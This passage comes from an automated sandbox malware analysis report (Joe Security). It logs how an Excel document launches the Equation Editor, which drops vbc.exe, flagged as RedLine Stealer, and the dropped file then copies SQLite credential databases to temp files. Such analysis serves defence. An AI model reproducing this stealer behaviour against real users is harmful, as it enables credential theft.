OperatorsGetCurrentProcessprocessgetPayloadNamesaddCancelKeyPressget_BaseAddressaddressDaylightDeltagetDisallowBindingRedirectsContainsNonCodeAccessPermissionsgetNamedPermissionSetsISOCurrencySymbolGetObjectsForNativeVariantsBgetDeclaredEventsge
2022-02-22 14:30:32 UTC 172 IN Data Raw: 0f 05 08 08 12 00 03 12 20 1d 0e 1d 12 80 8d 15 12 80 95 01 12 80 89 0d 00 02 15 12 80 9d 02 12 71 12 71 1c 18 09 15 12 80 9d 02 12 71 12 71 17 00 02 15 12 6d 01 12 71 15 12 6d 01 12 71 15 12 80 9d 02 12 71 12 71 0a 00 01 15 12 6d 01 1c 12 80 99 0b 00 02 15 12 80 9d 02 1c 1c 1c 18 05 15 12 6d 01 1c 07 15 12 80 9d 02 1c 1c 13 00 02 15 12 6d 01 1c 15 12 6d 01 1c 15 12 80 9d 02 1c 1c 26 07 14 05 1d 1c 08 08 08 1d 04 45 1d 08 1d 1c 08 1d 0a 1d 08 1d 05 0f 05 0f 05 45 1d 0a 08 0f 05 08 45 1d 04 1d 08 07 00 01 12 80 89 12 71 08 00 01 12 80 89 12 80 89 06 00 01 02 12 80 89 08 00 01 12 80 8d 12 80 91 08 00 01 12 80 85 12 80 89 06 00 01 0e 12 80 85 05 00 02 02 0e 0e 09 00 02 02 12 80 8d 12 80 8d 06 00 01 01 12 80 89 0b 00 01 08 15 12 80 95 01 12 80 89 0e 00 02 12 Data Ascii: qqqqmqmqqqmmmm&EEEq
2022-02-22 14:30:32 UTC 176 IN Data Raw: 00 6f 00 73 00 69 00 74 00 69 00 6f 00 6e 00 53 00 61 00 6d 00 70 00 6c 00 65 00 73 00 2e 00 64 00 6c 00 6c 00 00 00 48 00 12 00 01 00 4c 00 65 00 67 00 61 00 6c 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 20 00 32 00 30 00 32 00 32 00 00 00 64 00 1e 00 01 00 4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 43 00 6f 00 6d 00 70 00 6f 00 73 00 69 00 74 00 69 00 6f 00 6e 00 53 00 61 00 6d 00 70 00 6c 00 65 00 73 00 2e 00 64 00 6c 00 6c 00 00 00 54 00 1a 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 Data Ascii: ositionSamples.dllHLegalCopyrightCopyright 2022dOriginalFilenameWindowsCompositionSamples.dllTProductNameWindow
2022-02-22 14:30:32 UTC 180 IN Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-02-22 14:30:32 UTC 184 IN Data Raw: ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 fff1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef Data Ascii: BBBBBBBBBBBBBBBBBBBBBBBB
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 45 of 65
• EXCEL.EXE
• EQNEDT32.EXE
• vbc.exe
• vbc.exe
Click to jump to process
Target ID: 0
Start time: 15:29:22
Start date: 22/02/2022
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase: 0x13f5c0000
File size: 28253536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Reputation: high
Key Path Completion Count Source Address Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems success or wait 1 6DDF0648 unknown
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
+3- binary 2B 33 2D 00 14 0A 00 00 02 00 00 00 00 00 00 00 46 00 00 00 01 00 00 00 22 00 00 00 18 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 2E 00 78 00 6C 00 73 00 78 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 00 00
success or wait 1 6DDF0648 unknown
Statistics
Behavior
System Behavior
Analysis Process: EXCEL.EXE PID: 2580, Parent PID: 596
General
File Activities
Registry Activities
Key Created
Key Value Created
Copyright Joe Security LLC 2022 Page 46 of 65
Key Path Name Type Old Data New Data Completion CountSourceAddress
Symbol
Target ID: 2
Start time: 15:29:47
Start date: 22/02/2022
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: C, C++ or other language
Reputation: high
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
File Path Access Attributes Options Completion Count Source Address Symbol
File Path Offset Length Value Ascii Completion Count Source Address Symbol
File Path Offset Length Completion Count Source Address Symbol
Key Path Completion Count Source Address Symbol
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor success or wait 1 41369F RegCreateKeyExA
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0 success or wait 1 41369F RegCreateKeyExA
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options success or wait 1 41369F RegCreateKeyExA
Key Path Name Type Old Data New Data Completion CountSourceAddress
Symbol
Target ID: 4
Start time: 15:29:50
Start date: 22/02/2022
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: "C:\Users\Public\vbc.exe"
Imagebase: 0xf00000
File size: 14336 bytes
MD5 hash: 980EC4304344F277D722024ADE08CD01
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: .Net C# or VB.NET
Analysis Process: EQNEDT32.EXE PID: 2664, Parent PID: 596
General
File Activities
Registry Activities
Key Created
Analysis Process: vbc.exe PID: 1828, Parent PID: 2664
General
Copyright Joe Security LLC 2022 Page 47 of 65
Yara matches: Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches: Detection: 7%, ReversingLabs
Reputation: low
File Path Offset Length Completion Count Source Address Symbol
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D517995 unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6D517995 unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux
unknown 176 success or wait 1 6D42DE2C ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D51A1A4 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux
unknown 1720 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux
unknown 620 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux
unknown 584 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux
unknown 864 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux
unknown 900 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux
unknown 748 success or wait 1 6D42DE2C ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\4fc035341c55c61ce51e53d179d1e19d\Microsoft.VisualBasic.ni.dll.aux
unknown 1708 success or wait 1 6D42DE2C ReadFile
Key Path Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 success or wait 1 6B92AD76 unknown
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32
EnableFileTracing
dword 0 success or wait 1 6B92AD76 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32
EnableConsoleTracing
dword 0 success or wait 1 6B92AD76 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32
FileTracingMask dword -65536 success or wait 1 6B92AD76 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32
ConsoleTracingMask
dword -65536 success or wait 1 6B92AD76 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32
MaxFileSize dword 1048576 success or wait 1 6B92AD76 unknown
File Activities
File Read
Registry Activities
Key Created
Key Value Created
Copyright Joe Security LLC 2022 Page 48 of 65
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32
FileDirectory expand unicode %windir%\tracing success or wait 1 6B92AD76 unknown
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion CountSourceAddress
Symbol
Target ID: 5
Start time: 15:29:57
Start date: 22/02/2022
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0xf00000
File size: 14336 bytes
MD5 hash: 980EC4304344F277D722024ADE08CD01
Has elevated privileges: true
Has administrator privileges:
true
Programmed in: .Net C# or VB.NET
Yara matches: Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Users\user\AppData\Local\Temp\tmp6222.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp6417.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
Analysis Process: vbc.exe PID: 2844, Parent PID: 1828
General
File Activities
File Created
Copyright Joe Security LLC 2022 Page 49 of 65
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7108.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp738B.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7486.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7551.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp764C.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7718.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7841.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp790D.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp533A.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp read attributes | synchronize | generic read
device | sparse file
synchronous io non alert | non directory file
success or wait 1 6C517C90 GetTempFileNameW
C:\Users\user\AppData\Local\Yandex read data or list directory | synchronize
device | sparse file
directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 6C514247 CreateDirectoryW
C:\Users\user\AppData\Local\Yandex\YaAddon read data or list directory | synchronize
device | sparse file
directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 6C514247 CreateDirectoryW
File Path Access Attributes Options Completion Count Source Address Symbol
File Path Completion Count Source Address Symbol
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp success or wait 1 6C517D79 DeleteFileW
File Deleted
Copyright Joe Security LLC 2022 Page 50 of 65
C:\Users\user\AppData\Local\Temp\tmp6222.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp6417.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7108.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp738B.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7551.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7486.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7718.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp764C.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp790D.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7841.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp533A.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp success or wait 1 6C517D79 DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp success or wait 1 6C517D79 DeleteFileW
File Path Completion Count Source Address Symbol
File Path Offset Length Value Ascii Completion Count Source Address Symbol
C:\Users\user\AppData\Local\Temp\tmp6222.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C success or wait 1 3E6803 CopyFileW
File Written
Copyright Joe Security LLC 2022 Page 51 of 65
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp6417.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C success or wait 1 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 52 of 65
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp
0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C success or wait 1 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 53 of 65
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp
